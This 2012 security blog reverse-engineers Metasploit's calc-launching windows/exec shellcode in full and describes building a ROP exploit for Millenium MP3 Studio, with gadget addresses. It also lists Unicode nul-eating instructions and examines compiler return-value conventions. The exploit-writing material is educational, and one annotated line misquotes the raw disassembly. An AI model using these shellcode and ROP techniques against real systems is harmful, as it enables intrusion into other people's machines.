Tuesday, November 13, 2012

Understanding Windows shellcode 3

I recently gained some experience with Return Oriented Programming but my first attempt to build a ROP based exploit on my own was a failure at first (read about it here). However in order to solve the problem I had to understand exactly what went wrong and that forced me to read and understand the shellcode I had chosen.

I had chosen windows/exec and putting a breakpoint before it showed me that the decoder was in fact executed and decoded the shellcode. Also, the decoded shellcode was an exact match with the code I encoded. So...on with the reversing.

The first thing to do was to generate a disassembly of the windows/exec shellcode, which I got like this:

$ msfpayload windows/exec CMD=calc R | ndisasm -b 32 -

This is the disassembly in its entirety:

00000000  FC                cld
00000001  E889000000        call dword 0x8f
00000006  60                pushad
00000007  89E5              mov ebp,esp
00000009  31D2              xor edx,edx
0000000B  648B5230          mov edx,[fs:edx+0x30]
0000000F  8B520C            mov edx,[edx+0xc]
00000012  8B5214            mov edx,[edx+0x14]
00000015  8B7228            mov esi,[edx+0x28]
00000018  0FB74A26          movzx ecx,word [edx+0x26]
0000001C  31FF              xor edi,edi
0000001E  31C0              xor eax,eax
00000020  AC                lodsb
00000021  3C61              cmp al,0x61
00000023  7C02              jl 0x27
00000025  2C20              sub al,0x20
00000027  C1CF0D            ror edi,0xd
0000002A  01C7              add edi,eax
0000002C  E2F0              loop 0x1e
0000002E  52                push edx
0000002F  57                push edi
00000030  8B5210            mov edx,[edx+0x10]
00000033  8B423C            mov eax,[edx+0x3c]
00000036  01D0              add eax,edx
00000038  8B4078            mov eax,[eax+0x78]
0000003B  85C0              test eax,eax
0000003D  744A              jz 0x89
0000003F  01D0              add eax,edx
00000041  50                push eax
00000042  8B4818            mov ecx,[eax+0x18]
00000045  8B5820            mov ebx,[eax+0x20]
00000048  01D3              add ebx,edx
0000004A  E33C              jecxz 0x88
0000004C  49                dec ecx
0000004D  8B348B            mov esi,[ebx+ecx*4]
00000050  01D6              add esi,edx
00000052  31FF              xor edi,edi
00000054  31C0              xor eax,eax
00000056  AC                lodsb
00000057  C1CF0D            ror edi,0xd
0000005A  01C7              add edi,eax
0000005C  38E0              cmp al,ah
0000005E  75F4              jnz 0x54
00000060  037DF8            add edi,[ebp-0x8]
00000063  3B7D24            cmp edi,[ebp+0x24]
00000066  75E2              jnz 0x4a
00000068  58                pop eax
00000069  8B5824            mov ebx,[eax+0x24]
0000006C  01D3              add ebx,edx
0000006E  668B0C4B          mov cx,[ebx+ecx*2]
00000072  8B581C            mov ebx,[eax+0x1c]
00000075  01D3              add ebx,edx
00000077  8B048B            mov eax,[ebx+ecx*4]
0000007A  01D0              add eax,edx
0000007C  89442424          mov [esp+0x24],eax
00000080  5B                pop ebx
00000081  5B                pop ebx
00000082  61                popad
00000083  59                pop ecx
00000084  5A                pop edx
00000085  51                push ecx
00000086  FFE0              jmp eax
00000088  58                pop eax
00000089  5F                pop edi
0000008A  5A                pop edx
0000008B  8B12              mov edx,[edx]
0000008D  EB86              jmp short 0x15
0000008F  5D                pop ebp
00000090  6A01              push byte +0x1
00000092  8D85B9000000      lea eax,[ebp+0xb9]
00000098  50                push eax
00000099  68318B6F87        push dword 0x876f8b31
0000009E  FFD5              call ebp
000000A0  BBF0B5A256        mov ebx,0x56a2b5f0
000000A5  68A695BD9D        push dword 0x9dbd95a6
000000AA  FFD5              call ebp
000000AC  3C06              cmp al,0x6
000000AE  7C0A              jl 0xba
000000B0  80FBE0            cmp bl,0xe0
000000B3  7505              jnz 0xba
000000B5  BB4713726F        mov ebx,0x6f721347
000000BA  6A00              push byte +0x0
000000BC  53                push ebx
000000BD  FFD5              call ebp
000000BF  63616C            arpl [ecx+0x6c],sp
000000C2  6300              arpl [eax],ax

This supposedly executes "calc".

Let's cut it up a little and comment what happens. In my point of view the code consists of three overall stages: Setup, "Magic" function and execution.

Setup

;Make LOD* instructions increment addresses
00000000  FC                cld
;Push EIP onto stack so that we know where we are...then jump to 0x8f
;The value pushed is the address of the instruction following the call.
00000001  E889000000        call dword 0x8f
;..... Here lies the magic function
;Pop the address into EBP so that it contains the address of the magic function
0000008F  5D                pop ebp

Setup is short. The magic function will use LOD* instructions and they should move from low to higher adresses so the direction flag is cleared. Then the code calls past the magic function to a POP EBP so that EBP contains the address of the function.

Now setup is done.

Execution

I will describe the magic function later since it is quite large...for now know that it locates other functions and executes them.

;Push the value 1 onto the stack (this is actually the second argument to WinExec)
00000090  6A01              push byte +0x1
;Load the address of the "calc" string at 0xbf into EAX
00000092  8D85B9000000      lea eax,[ebp+0xb9]
;Push the address of "calc" onto the stack (first argument to WinExec)
00000098  50                push eax
;Push the value 0x876f8b31 onto the stack...this is a hash and will be explained later
00000099  68318B6F87        push dword 0x876f8b31
;Call the function at 0x6...the function will return to the next instruction
0000009E  FFD5              call ebp
;Put the value 0x56a2b5f0 into EBX...also a hash
000000A0  BBF0B5A256        mov ebx,0x56a2b5f0
;Put value 0x9dbd95a6 onto stack...you guessed it, it's a hash
000000A5  68A695BD9D        push dword 0x9dbd95a6
;Call the magic function
000000AA  FFD5              call ebp
;Compare low byte in EAX register to the value 6
000000AC  3C06              cmp al,0x6
;If it is less that 6, go to 0xba and skip the next section which may change the
;hash that was put into EBX at address 0xa0
000000AE  7C0A              jl 0xba
;Compare low part of EBX to 0xe0 (at first this didn't make sense
;as EBX at this point is 0x56a2b5f0 and thus BL is 0xf0 but there is an explanation)
000000B0  80FBE0            cmp bl,0xe0
;If it equals goto 0xba...it will not equal in our example
000000B3  7505              jnz 0xba
;If we got here then change EBX to 0x6f721347
000000B5  BB4713726F        mov ebx,0x6f721347
;Now...put a zero byte on the stack (first argument for ExitProcess)
000000BA  6A00              push byte +0x0
;Push the hash...whatever it is (either 0x56a2b5f0 or 0x6f721347)
000000BC  53                push ebx
;Again...call the magic function
000000BD  FFD5              call ebp 
;Yes...these are not instructions but rather the name of the program to execute 
000000BF  63616C6300        db "calc",0

Pseudocode of the above look something like this:

MagicFunction(HASH(WinExec), "calc", SW_SHOWNORMAL);
DWORD version = MagicFunction(HASH(GetVersion));
if (LOBYTE(LOWORD(version)) >= 6 && (char)hash_of_chosen_exitmethod == 0xa0) {
    /* We are on Windows Vista, Windows 2008, Windows 7 or Windows 8
     * and the penetration tester chose to use ExitThread.
     * Use RtlExitUserThread instead.
     */
    hash_of_chosen_exitmethod = HASH(RtlExitUserThread);
}
MagicFunction(hash_of_chosen_exitmethod, 0);

What does all this mean ?
The magic function (which we will look at in a moment) takes a hash of the function that we want to call combined with a hash of the dll that contains the function, plus any arguments to the function we want to call.

So we start by having it invoke WinExec with "calc" and SW_SHOWNORMAL.
After that we call an exit function. We can override which function should be used by specifying the EXITFUNC option to 'msfpayload'. Valid options are 'process' which corresponds to ExitProcess, 'thread' which corresponds to ExitThread, 'seh' which is SetUnhandledExceptionFilter, and 'none' which will just call GetLastError.

As we can see, the shellcode will not use ExitThread if running on a Windows version higher than XP. In this case RtlExitUserThread will be called instead.

So, now we know what functions will be called. Lets take a look at the magic function to see how this is actually done.

Magic function

The magic function is not actually magic, but it is very clever. It is a sort of hashed linker using Skapes trick for finding a function inside a dll whose name equals a hash, but instead of us having to specify the base address of the dll to search this function will search all loaded dlls for a function matching the hash.
The hash is formed by combining the hash of the dlls name and the functions name. The arguments to the not so magic but clever function is the hash to search for and then the arguments to the function to search for. This may be better explained with pseudo code:

function MagicFunction(long hash, ...) {
    for each loaded dll {
        dll_name_hash = hash(dll.name);
        for each exported symbol {
            symbol_hash = hash(symbol);
            combined_hash = dll_name_hash + symbol_hash;
            if (combined_hash == hash) {
                remove_hash_from_stack;
                put_return_address_on_stack;
                jump(symbol);
            }
        }
    }
}

Something like that. The function removes the hash from the stack and puts the original return address on the stack instead so the jump to the found function will act like a call. When the found function returns it will not return into the FindAndExecute function but to the location where FindAndExecute was called. Very clever. Lets see how this is actually done.

;Preserve all registers, except EAX, ECX and EDX (as we will see in the and
00000006  60                pushad
;Build new stack frame, just like a compiler generated function
00000007  89E5              mov ebp, esp
;Zero out EDX
00000009  31D2              xor edx, edx
;Get pointer to PEB into EDX
;FS register points to TEB: http://www.nirsoft.net/kernel_struct/vista/TEB.html
;FS+0x30 is the PEB: http://www.nirsoft.net/kernel_struct/vista/PEB.html
0000000B  648B5230          mov edx,[fs:edx+0x30]
;Get address of LDR into EDX
;http://www.nirsoft.net/kernel_struct/vista/PEB_LDR_DATA.html
0000000F  8B520C            mov edx,[edx+0xc]
;Get address of InMemoryOrderModuleList list entry into EDX
00000012  8B5214            mov edx,[edx+0x14]

Now EDX points to the first list list entry in memory order. Here begins a loop through all entries in the list.

;We will loop here so we put a label
check_next_dll:
;Get address of base dll name unicode string into ESI
;http://www.nirsoft.net/kernel_struct/vista/LDR_DATA_TABLE_ENTRY.html
;http://www.nirsoft.net/kernel_struct/vista/UNICODE_STRING.html
00000015  8B7228            mov esi,[edx+0x28]
;Get maximum length of base dll name unicode string into ECX
00000018  0FB74A26          movzx ecx,word [edx+0x26]
;Initialize hash to zero
0000001C  31FF              xor edi,edi

Now ESI points to the dll name in Unicode, ECX contains the maximum length in bytes (number of bytes used for the name plus null terminator) and EDI is zero. EDI will eventually contain the hash.

Now we enter a hashing loop.

load_next_character:
;AL will contain a character but high bits needs to be zeroed
0000001E  31C0              xor eax,eax
;Load next byte from address pointed to by ESI into AL and increment ESI by one
00000020  AC                lodsb
;Compare to 'a'
00000021  3C61              cmp al,'a'
;If less than then the character is already uppercase or punctuation
00000023  7C02              jl upper_case
;Subtract 0x20 to make upper case
00000025  2C20              sub al,0x20
upper_case:
;Update hash in EDI
00000027  C1CF0D            ror edi,0xd
0000002A  01C7              add edi,eax
;If we have more characters in the string...
0000002C  E2F0              loop load_next_character

Now EDI contains the hash of the dll name, and EDX still points to the dll in memory order list entry. Next we will find the current dll export list so that we can iterate through all exported functions.

;Save dll list entry
0000002E  52                push edx
;Save dll name hash
0000002F  57                push edi
;Put current modules base addr in EDX
00000030  8B5210            mov edx,[edx+0x10]
;Put PE header offset into EAX
00000033  8B423C            mov eax,[edx+0x3c]
;Make address absolute
00000036  01D0              add eax,edx
;Put offset of exports into EAX
00000038  8B4078            mov eax,[eax+0x78]
;If offset is zero (meaning no exports?)
0000003B  85C0              test eax,eax
;...then go past the code that looks at the export table
0000003D  744A              jz not_found
;...otherwise make address absolute
0000003F  01D0              add eax,edx
;Save address of exports
00000041  50                push eax
;Put number of exported symbols into ECX
00000042  8B4818            mov ecx,[eax+0x18]
;Put offset of names into EBX
00000045  8B5820            mov ebx,[eax+0x20]
;Make address absolute
00000048  01D3              add ebx,edx

At this point ECX contains the number of exported symbols, EBX points to the first entry in the export list and EDX points to the dll base address. The export entries are offsets to where the name lies in memory.

Next comes a loop over all the exported symbols.

;Here we start a loop that runs over all exported symbols
next_symbol:
;If there are no more exported symbols
0000004A  E33C              jecxz no_more_symbols
;Decrement ECX so that we can use it as an offset into the export list
0000004C  49                dec ecx
;Put offset of name into ESI
0000004D  8B348B            mov esi,[ebx+ecx*4]
;Make absolute
00000050  01D6              add esi,edx
;Initialize EDI to zero. EDI will hold the hash of the name
00000052  31FF              xor edi,edi
;Here starts a loop that hashes the name
next_symbol_char:
;AL will contain next character but higher bits needs zeroing
00000054  31C0              xor eax,eax
;Read next character
00000056  AC                lodsb
;Update hash
00000057  C1CF0D            ror edi,0xd
0000005A  01C7              add edi,eax
;Have we reached the end (zero terminated string)
0000005C  38E0              cmp al,al
;If not, read next character
0000005E  75F4              jnz next_symbol_char
;Hash is complete. Combine dll name (at EBP-8) hash with symbol hash
00000060  037DF8            add edi,[ebp-0x8]
;Compare combined hash to first argument to magic function
00000063  3B7D24            cmp edi,[ebp+0x24]
;If not the same try next symbol
00000066  75E2              jnz next_symbol:

If we get past the JNZ instruction it is because the hash matched. In that case the corresponding function should be executed but first its location needs to be found and the stack must be prepared so that it looks like it was called normally.
At this point the stack looks like this:


The return address is the address of the instruction following the 'CALL EBP' which invoked the magic function. It is the address we want WinExec to return to, so when we have found WinExec we need to remove all the other stuff on the stack and put the return address where the hash is now. Lets see how this happens.

;Restore export table address
00000068  58                pop eax
;Get offset of ordinals into EBX
00000069  8B5824            mov ebx,[eax+0x24]
;Make absolute
0000006C  01D3              add ebx,edx
;Get ordinal of symbol into CX (ordinals are 16 bits)
0000006E  668B0C4B          mov cx,[ebx+ecx*2]
;Offset of function table into EBX
00000072  8B581C            mov ebx,[eax+0x1c]
;Make absolute
00000075  01D3              add ebx,edx
;Put offset of function into EAX
00000077  8B048B            mov eax,[ebx+ecx*4]
;Make absolute
0000007A  01D0              add eax,edx

Now we have the address of the function in EAX. Next we fix the stack.

;Replace PUSHADed EAX
0000007C  89442424          mov [esp+0x24],eax
;Remove top item on stack (address of exports)
00000080  5B                pop ebx
;Remove top item on stack (dll name hash)
00000081  5B                pop ebx
;Restore all registers and remove PUSHADed data
00000082  61                popad
;Get original return address
00000083  59                pop ecx
;Remove hash
00000084  5A                pop edx
;Restore return address
00000085  51                push ecx
;Now simply jump to the function, it will look like it was simply called
00000086  FFE0              jmp eax

The last four instructions do the clever "call" to the found function. WinExec will see the original return address and two arguments, believing it was called normally.
We have now covered the most interesting parts of the magic function but there is still five instructions left to cover. Earlier we jumped to 'no_more_symbols' if the iteration through the symbol table reached the end, or to 'not_found' if no symbol table was found. Those two jumps were to locations past the execution of the found function and they follow here:

;We jump here if we have moved past all symbols in the dll
no_more_symbols:
;Restore address of exports structure
00000088  58                pop eax
;We jump here if no exports table was found
not_found:
;Remove saved dll name hash
00000089  5F                pop edi
;Restore address of current in memory order module list entry
0000008A  5A                pop edx
;Follow linked list to next entry
0000008B  8B12              mov edx,[edx]
;Check next dll
0000008D  EB86              jmp check_next_dll

Now the analysis is complete. One thing to note about this last bit is that the function you look for had better be found. Otherwise the program will certainly crash as there is no check for having reached the last entry in the linked list.

I hope you will agree that this function is not really magic but rather a thing of beauty. It is very generic and thus can be used as a basic building block in all shellcodes. And this is exactly what has happened. If you look in all Windows payloads in Metasploit you will see this function.

After I had reverse engineered the windows/exec shellcode someone told me that I could have read the original assembly source with comments. It is located in 'external/source/shellcode/windows/x86/src/single/single_exec.asm'.

While this is true, I believe that I got more out of doing the hard work myself. When reverse engineering you really have to understand all the details and look up documentation on the different structures that are used. When reading the comments I have a tendency to skip this and just trust the comments.

I hope you enjoyed this as much as I did.

Monday, August 6, 2012

Lesson learned from my first ROP exploit

I have been following corelanc0d3rs excellent exploit writing tutorials and I have finished the one about Return Oriented Programming. That was easier than I had thought.

But I wanted to test myself to see if I had really understood the technique and it turned out that I still had a lot to learn (surprise!).

The software I chose to work on was Millenium MP3 Studio which was the topic of a Corelan tutorial on SEH exploitation. I had exploited this one previously so I kind of knew what was going on.

I chose to go for a call to VirtualProtect as in the Corelan ROP tutorial and there was a lengthy list of bad characters (in the beginning I only knew about 0x00, 0x0a and 0x0d but more came up later), which narrowed down which addresses and other data could  be expressed.

The Immunity Debugger is an excellent tool and I recommend it highly, and with the Mona.py command exploitation gets much easier. I collected the ROP gadgets found by Mona and started digging for useful ones.

I found a gadget, which could pivot the stack into my payload:
0x10019d3c   ADD ESP, 0x41c # RETN

...thus, my chain could begin.

I needed a chain, which could write an arbitrary number into an arbitrary address, and this was not really difficult but quite time consuming. I ended up with this:
0x100205d8  # POP ESI # RETN
0x1001c348  # POP EAX # RETN
0x100205d5  # SUB EAX, ESI # POP EDI # POP ESI # RETN
0x1001f826  # POP ECX # RETN
0x1001f826  # ADD ECX, ESI # MOV DWORD PTR DS:[EAX], ECX # MOV EAX, 1 # POP EDI # POP ESI # POP EBX # RETN

The first three enables me to put any value into EAX. The last one is quite cool as it both builds the data to be written in ECX and then actually writes it to the address pointed to by EAX. I use the ESI register in both gadgets and both end up popping into it, so both gadgets do a lot of my work and I did not have to use the first "POP ESI # RETN" gadget again. Very cool.

Now, with this chain things took off. I could simply just replay them several times with different data put into ESI, EAX and ECX (the other registers just contain garbage as they are not actually used).

The last part of the exploit needed to adjust the stack to point to my VirtualProtect arguments and I chose this gadget:
0x1001c611  # MOV ESP, EBP # POP EBP # RETN

So I just needed to put the address into EBP first. For that I used these gadgets:
0x10017f66  # POP EBP # RETN
0x1001ff4f  # POP EBX # RETN
0x10017a18  # AND AL, 0x22 # SUB EBP, EBX # OR DH, DH # RETN

And it worked!
Well, sort of...actually not.

My ROP chain ran beautifully, VirtualProtect was called with all the right parameters, it returned into my shellcode, shikata ga nai ran and decoded the payload, the payload ran and called WinExec...but WinExec failed with a return code meaning ERROR_FILE_NOT_FOUND.
Why?

Actually, I had no idea how much of the shellcode actually ran, but I could see that shikata ga nai ran and decoded the payload and that the result matched the one I had chosen. I had to reverse engineer the payload (windows/exec from Metasploit) to discover what went wrong. This is a very cool payload and I will probably write a blog post about it. For now, just know that it makes a call to WinExec and it failed.

I tried building the stack by hand using Immunity Debugger and returing into VirtualProtect. That worked fine and "calc" was executed. Why?

Obviously my ROP code altered something critical, but what?

I then tried a binary search, running half my chain, then building the stack and returning. "calc" ran.

This took a lot of tries so I ended up writing my first Immunity Debugger PyCommand:
import immlib

def main(args):
    imm = immlib.Debugger()
    stack = imm.getRegs()['ESP']
    data = "\xd0\x1a\x80\x7c"
    data += "\xe2\x5d\x13\x00"
    data += "\xe2\x5d\x13\x00"
    data += "\xe2\x00\x00\x00"
    data += "\x40\x00\x00\x00"
    data += "\x10\x90\x03\x10"
    imm.writeMemory(stack, data)
    return "[*] PyCommand Executed...YAY"
That sped things up, but "calc" ran every time. Except after having modified the stack pointer...the very last ROP gadget.
And then it hit me. The stack ended up not being aligned on a four byte boundary, and apparently that was not a problem for VirtualProtect, nor for shikata ga nai, nor for the shellcode but WinExec had a problem with it.

Aligning the data fixed the problem...I get "calc" now.
The resulting exploit can be found here and I have posted a demo video here.

I am not quite happy with the result as there still are problems. I hardcoded some addresses to the stack. They seemed stable on a particular version of Windows, so on the command line for the exploit you choose the version of Windows that you are exploiting (only XP SP 2 and 3 are supported at the moment). However, I am not sure this is true. I did a couple of reboots and the stack was still stable at those addresses, but this occurs to me as being odd. Why have ASLR and not randomize the stack ?

In my next ROP exploit I will calculate all addresses...no more hardcoding.

Lessons learned:

  • Align stack on four byte boundary
  • Finding a useful ROP chain is time consuming
  • When a useful ROP chain has been found things really take off
  • Immunity Debugger PyCommands are very cool and needs more looking into
  • GDB can also be scripted using Python
  • You can learn a lot by reversing Metasploit payloads
  • You can learn a lot by screwing up

Monday, July 16, 2012

Returning data from functions

I have been wondering....is the return value from functions always in EAX/RAX ?

This cannot be. If you return floating point data or an entire structure, how can that be fitted inside EAX ?

And also I have been tought that returning a struct is bad. Is this really so ? Lets find out.

First we'll write some simple C code and see how the compiler implements it:

int return_int(int a, int b) {
    return a + b;
}

float return_float(float a, float b) {
    return a + b;
}

double return_double(double a, double b) {
    return a + b;
}

long long return_longlong(long long a, long long b) {
    return a + b;
}

struct my_struct {
    int a;
    int b;
    int c;
    int d;
    int e;
};

struct my_struct return_my_struct(int a, int b) {
    struct my_struct s;
    s.a = a;
    s.b = b;
    s.c = a + b;
    s.d = a * b;
    s.e = 7;
    return s;
}

int main(int argc, char const *argv[]) {
    return 0;
}

Alright. Lets take a look at the return_int function:

(gdb) disassemble return_int
Dump of assembler code for function return_int:
   0x00000000004004b4 <+0>: push   rbp
   0x00000000004004b5 <+1>: mov    rbp,rsp
   0x00000000004004b8 <+4>: mov    DWORD PTR [rbp-0x4],edi
   0x00000000004004bb <+7>: mov    DWORD PTR [rbp-0x8],esi
   0x00000000004004be <+10>: mov    eax,DWORD PTR [rbp-0x8]
   0x00000000004004c1 <+13>: mov    edx,DWORD PTR [rbp-0x4]
   0x00000000004004c4 <+16>: add    eax,edx
   0x00000000004004c6 <+18>: pop    rbp
   0x00000000004004c7 <+19>: ret    
End of assembler dump.
(gdb) 

The int datatype fits nicely into eax so this is used here. What about float ?

(gdb) disassemble return_float
Dump of assembler code for function return_float:
   0x00000000004004c8 <+0>: push   rbp
   0x00000000004004c9 <+1>: mov    rbp,rsp
   0x00000000004004cc <+4>: movss  DWORD PTR [rbp-0x4],xmm0
   0x00000000004004d1 <+9>: movss  DWORD PTR [rbp-0x8],xmm1
   0x00000000004004d6 <+14>: movss  xmm0,DWORD PTR [rbp-0x4]
   0x00000000004004db <+19>: addss  xmm0,DWORD PTR [rbp-0x8]
   0x00000000004004e0 <+24>: pop    rbp
   0x00000000004004e1 <+25>: ret    
End of assembler dump.
(gdb) 

This time xmm0 is used, and so is it for double:

(gdb) disassemble return_double
Dump of assembler code for function return_double:
   0x00000000004004e2 <+0>: push   rbp
   0x00000000004004e3 <+1>: mov    rbp,rsp
   0x00000000004004e6 <+4>: movsd  QWORD PTR [rbp-0x8],xmm0
   0x00000000004004eb <+9>: movsd  QWORD PTR [rbp-0x10],xmm1
   0x00000000004004f0 <+14>: movsd  xmm0,QWORD PTR [rbp-0x8]
   0x00000000004004f5 <+19>: addsd  xmm0,QWORD PTR [rbp-0x10]
   0x00000000004004fa <+24>: pop    rbp
   0x00000000004004fb <+25>: ret    
End of assembler dump.
(gdb) 

However, as you may have noticed, the instructions are different. For the float datatype movss and addss are used while movsd and addsd are used for double.
The 's' means "single precision floating point" while the 'd' means "double precision floating point"...that's the entire difference.
Now, the long long is double the size of an int so a bigger register is needed:

(gdb) disassemble return_longlong
Dump of assembler code for function return_longlong:
   0x00000000004004fc <+0>: push   rbp
   0x00000000004004fd <+1>: mov    rbp,rsp
   0x0000000000400500 <+4>: mov    QWORD PTR [rbp-0x8],rdi
   0x0000000000400504 <+8>: mov    QWORD PTR [rbp-0x10],rsi
   0x0000000000400508 <+12>: mov    rax,QWORD PTR [rbp-0x10]
   0x000000000040050c <+16>: mov    rdx,QWORD PTR [rbp-0x8]
   0x0000000000400510 <+20>: add    rax,rdx
   0x0000000000400513 <+23>: pop    rbp
   0x0000000000400514 <+24>: ret    
End of assembler dump.
(gdb) 

And therefore rax is used since this is on a 64 bit machine. What would the same C code be compiled into on a 32 bit processor ? I tried and got this:

(gdb) disassemble return_longlong 
Dump of assembler code for function return_longlong:
   0x080483b4 <+0>: push   ebp
   0x080483b5 <+1>: mov    ebp,esp
   0x080483b7 <+3>: push   ebx
   0x080483b8 <+4>: sub    esp,0x14
   0x080483bb <+7>: mov    eax,DWORD PTR [ebp+0x8]
   0x080483be <+10>: mov    DWORD PTR [ebp-0x10],eax
   0x080483c1 <+13>: mov    eax,DWORD PTR [ebp+0xc]
   0x080483c4 <+16>: mov    DWORD PTR [ebp-0xc],eax
   0x080483c7 <+19>: mov    eax,DWORD PTR [ebp+0x10]
   0x080483ca <+22>: mov    DWORD PTR [ebp-0x18],eax
   0x080483cd <+25>: mov    eax,DWORD PTR [ebp+0x14]
   0x080483d0 <+28>: mov    DWORD PTR [ebp-0x14],eax
   0x080483d3 <+31>: mov    eax,DWORD PTR [ebp-0x18]
   0x080483d6 <+34>: mov    edx,DWORD PTR [ebp-0x14]
   0x080483d9 <+37>: mov    ecx,DWORD PTR [ebp-0x10]
   0x080483dc <+40>: mov    ebx,DWORD PTR [ebp-0xc]
   0x080483df <+43>: add    eax,ecx
   0x080483e1 <+45>: adc    edx,ebx
   0x080483e3 <+47>: add    esp,0x14
   0x080483e6 <+50>: pop    ebx
   0x080483e7 <+51>: pop    ebp
   0x080483e8 <+52>: ret    
End of assembler dump.
(gdb) 

Quite a bit more code. Tricks are used since long long is 64 bits wide and the 32 bit machine cannot hold this in one register. Instead two registers are used to represent one number. In this case we see that eax is used for containing the bottom half and edx contains the top half.

Now, the struct return is interesting:

(gdb) disassemble return_my_struct 
Dump of assembler code for function return_my_struct:
   0x0000000000400515 <+0>: push   rbp
   0x0000000000400516 <+1>: mov    rbp,rsp
   0x0000000000400519 <+4>: mov    QWORD PTR [rbp-0x28],rdi
   0x000000000040051d <+8>: mov    DWORD PTR [rbp-0x2c],esi
   0x0000000000400520 <+11>: mov    DWORD PTR [rbp-0x30],edx
   0x0000000000400523 <+14>: mov    eax,DWORD PTR [rbp-0x2c]
   0x0000000000400526 <+17>: mov    DWORD PTR [rbp-0x20],eax
   0x0000000000400529 <+20>: mov    eax,DWORD PTR [rbp-0x30]
   0x000000000040052c <+23>: mov    DWORD PTR [rbp-0x1c],eax
   0x000000000040052f <+26>: mov    eax,DWORD PTR [rbp-0x30]
   0x0000000000400532 <+29>: mov    edx,DWORD PTR [rbp-0x2c]
   0x0000000000400535 <+32>: add    eax,edx
   0x0000000000400537 <+34>: mov    DWORD PTR [rbp-0x18],eax
   0x000000000040053a <+37>: mov    eax,DWORD PTR [rbp-0x2c]
   0x000000000040053d <+40>: imul   eax,DWORD PTR [rbp-0x30]
   0x0000000000400541 <+44>: mov    DWORD PTR [rbp-0x14],eax
   0x0000000000400544 <+47>: mov    DWORD PTR [rbp-0x10],0x7
   0x000000000040054b <+54>: mov    rax,QWORD PTR [rbp-0x28]
   0x000000000040054f <+58>: mov    rdx,QWORD PTR [rbp-0x20]
   0x0000000000400553 <+62>: mov    QWORD PTR [rax],rdx
   0x0000000000400556 <+65>: mov    rdx,QWORD PTR [rbp-0x18]
   0x000000000040055a <+69>: mov    QWORD PTR [rax+0x8],rdx
   0x000000000040055e <+73>: mov    edx,DWORD PTR [rbp-0x10]
   0x0000000000400561 <+76>: mov    DWORD PTR [rax+0x10],edx
   0x0000000000400564 <+79>: mov    rax,QWORD PTR [rbp-0x28]
   0x0000000000400568 <+83>: pop    rbp
   0x0000000000400569 <+84>: ret    
End of assembler dump.
(gdb)

Here we se that the structure is built on the functions stack frame and then (from address 0x40054b) the local structure is copied out to an address that the caller specifies. This is quite bad, but what happens if we ask the compiler to optimize (-O3) ?
Then we get this:

(gdb) disassemble return_my_struct
Dump of assembler code for function return_my_struct:
   0x0000000000400500 <+0>: lea    ecx,[rsi+rdx*1]
   0x0000000000400503 <+3>: mov    DWORD PTR [rdi],esi
   0x0000000000400505 <+5>: mov    rax,rdi
   0x0000000000400508 <+8>: imul   esi,edx
   0x000000000040050b <+11>: mov    DWORD PTR [rdi+0x4],edx
   0x000000000040050e <+14>: mov    DWORD PTR [rdi+0x10],0x7
   0x0000000000400515 <+21>: mov    DWORD PTR [rdi+0x8],ecx
   0x0000000000400518 <+24>: mov    DWORD PTR [rdi+0xc],esi
   0x000000000040051b <+27>: ret    
End of assembler dump.
(gdb) 

This is much shorter and the address of the destination structure is used locally. This is much better and sort of the same as if the function had taken a pointer to the destination structure explicitly in the C source. Maybe we should not be so worried about letting the compiler do these kinds of optimizations for us...if in doubt, disassemble the result and take a look.

Wednesday, July 4, 2012

Unicode exploits

A couple of days ago I finished the Unicode exploitation tutorials from Corelan. You can find the exploits I developed here and here.

In the article Peter Van Eeckhoutte listed some instructions for "eating" added nul bytes, but not all of them.

They are quite useful so I have tried to create a list of them all. The binary format of a unicode nul eating instruction is "00XX00" where the XX is a number greater than zero and less than 0x7f.
I did the following:

$ for i in {1..127}; do php -r 'echo "\x00\x'$(printf "%x" $i)'\x00";' | ndisasm -b 32 - > $(printf "%x.s" $i); done
$ for file in *; do if [ $(wc -l $file|awk '{print $1}') != "1" ]; then rm -f $file; fi; done

Now the files in the directory contains single instructions of the needed format. These are the instructiosn:

000400            add [eax+eax],al
000C00            add [eax+eax],cl
001400            add [eax+eax],dl
001C00            add [eax+eax],bl
002400            add [eax+eax],ah
002C00            add [eax+eax],ch
003400            add [eax+eax],dh
003C00            add [eax+eax],bh
004000            add [eax+0x0],al
004100            add [ecx+0x0],al
004200            add [edx+0x0],al
004300            add [ebx+0x0],al
004500            add [ebp+0x0],al
004600            add [esi+0x0],al
004700            add [edi+0x0],al
004800            add [eax+0x0],cl
004900            add [ecx+0x0],cl
004A00            add [edx+0x0],cl
004B00            add [ebx+0x0],cl
004D00            add [ebp+0x0],cl
004E00            add [esi+0x0],cl
004F00            add [edi+0x0],cl
005000            add [eax+0x0],dl
005100            add [ecx+0x0],dl
005200            add [edx+0x0],dl
005300            add [ebx+0x0],dl
005500            add [ebp+0x0],dl
005600            add [esi+0x0],dl
005700            add [edi+0x0],dl
005800            add [eax+0x0],bl
005900            add [ecx+0x0],bl
005A00            add [edx+0x0],bl
005B00            add [ebx+0x0],bl
005D00            add [ebp+0x0],bl
005E00            add [esi+0x0],bl
005F00            add [edi+0x0],bl
006000            add [eax+0x0],ah
006100            add [ecx+0x0],ah
006200            add [edx+0x0],ah
006300            add [ebx+0x0],ah
006500            add [ebp+0x0],ah
006600            add [esi+0x0],ah
006700            add [edi+0x0],ah
006800            add [eax+0x0],ch
006900            add [ecx+0x0],ch
006A00            add [edx+0x0],ch
006B00            add [ebx+0x0],ch
006D00            add [ebp+0x0],ch
006E00            add [esi+0x0],ch
006F00            add [edi+0x0],ch
007000            add [eax+0x0],dh
007100            add [ecx+0x0],dh
007200            add [edx+0x0],dh
007300            add [ebx+0x0],dh
007500            add [ebp+0x0],dh
007600            add [esi+0x0],dh
007700            add [edi+0x0],dh
007800            add [eax+0x0],bh
007900            add [ecx+0x0],bh
007A00            add [edx+0x0],bh
007B00            add [ebx+0x0],bh
007D00            add [ebp+0x0],bh
007E00            add [esi+0x0],bh
007F00            add [edi+0x0],bh

I hope these are useful.

Saturday, June 9, 2012

Understanding Windows shellcode 2

Having read and understood Skapes paper on Windows shellcode I thought I'd better provide yet another explanation on how it works. Yesterday I explained finding kernel32.dll so today I will explain Skapes method of resolving symbols inside a dll.

Over at OpenRCE you can find a very useful PDF describing the structure of a PE file but I have drawn a diagram showing only the necessary elements:
Relevant parts of a PE file
All addresses inside the PE file are relative to the base address...they are NOT absolute.

Skapes 'find_function' function takes two arguments. The first being the base address of the dll to search and the second being a hash code of the name to find. Thus the stack upon entering the function looks like this:
Stack layout after having entered the function
First instruction (pushad) saves the value of all general purpose registers and a couple of others after which the stack looks like this:
Stack layout after having executed the 'pushad' instruction

